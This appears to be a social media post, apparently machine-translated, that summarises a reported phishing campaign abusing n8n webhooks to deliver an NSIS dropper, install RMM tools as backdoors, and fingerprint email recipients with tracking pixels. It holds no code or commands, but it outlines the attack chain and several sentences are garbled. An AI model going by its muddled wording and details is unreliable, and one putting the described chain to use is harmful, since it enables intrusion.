A group of hackers using n8n Webhooks sent malware via mail.

The hacker group uses n8n Webhooks to send malware via Phishing email for a long time since 2025.

Sending emails to deceive victims by phishing means is called a classic method of spreading malware to victims. Many people may understand that it uses a common deceptive email delivery tool to do this. In fact, today, a tool that many people do not believe can be used for this purpose has been used.

According to a report by The Hacker News website, the hackers behind the Phishing email fraud campaign have been used to create workflow tools to automate AI or Artificial Intelligence. N8n is also involved in these campaigns. It is used to create Webhook, a mechanism to send data from source to destination with requests (requests) automatically that will result in applications that work with Webhook to automate the event. Define it on the script, which is, of course, a collaborative application in this case is malware itself.

The task of this campaign starts with hackers sending an email with a Webhook embedded in n8n as an attachment that claims to be an archives. When the victim opens, the link will take the victim to a Captcha authentication screen. If the victim is done, it will lead to downloading and installing a malware extension (Dropper) that comes in the NSIS file format (Nullsoft Scriptable Install System). The malware will create persistence on the system by registering malware DLL files and malware-related Service (Service) to guarantee that the malware will resume. Every time the machine is rebooted, the last step leads to running a PowerShell script to download tools such as Datto and ITarian Endpoint Management in the MSI Installer file format. These two tools are tools for Remote Monitoring and Management, which will act as backdoor malware, connecting to a C2 or Command and Control server. Hackers can log in at any time.

A research team from Cisco Talos, a network management specialist, explained that the hackers behind it use the subdomain of n8n called .app.n8n [.] cloud to use the Request receiver from Webhook embedded in Phishing email, which, after receiving the data, leads to the workflow set up by the hackers on the n8n system, leading to the embedding of malware as mentioned above, but the ability of n8n's Webhook has other capabilities: the "fingerprint" feature. (Fingerprint) By simply embedding an invisible image file or a Tracking Code with a n8n-generated Webhook URL. When the victim opens the email, Webhook sends the HTTP GET protocol Request back to the source with identity information such as the victim's email address (Email Address) that will automatically identify who opened the email.

# Trending # Lemon 8 Howtoo # lemon 8 diary # n8n # freedomhack